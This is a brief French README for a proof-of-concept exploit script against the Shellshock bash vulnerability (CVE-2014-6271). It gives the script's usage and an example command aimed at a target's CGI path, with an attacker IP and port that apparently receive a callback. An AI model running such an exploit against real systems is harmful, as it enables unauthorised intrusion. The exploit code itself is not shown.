
Preuve de concept pour abuser de la vulnérabilité Shellshock (CVE-2014-6271).
Cet exploit abuse de la vulnérabilité Shellshock (CVE-2014-6271) présente dans bash de sa version 1.14 jusqu'à la 4.3.
python3 ./exploit.py -t <target-ip:str> -u <uri:str> -a <attacker-ip:str> -p <port:int>
Exemple :
python3 ./exploit.py -t 10.10.10.15 -u /cgi-bin/vulnerable -a 10.10.10.7 -p 4443
Plus d'informations sur la vulnérabilité :
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271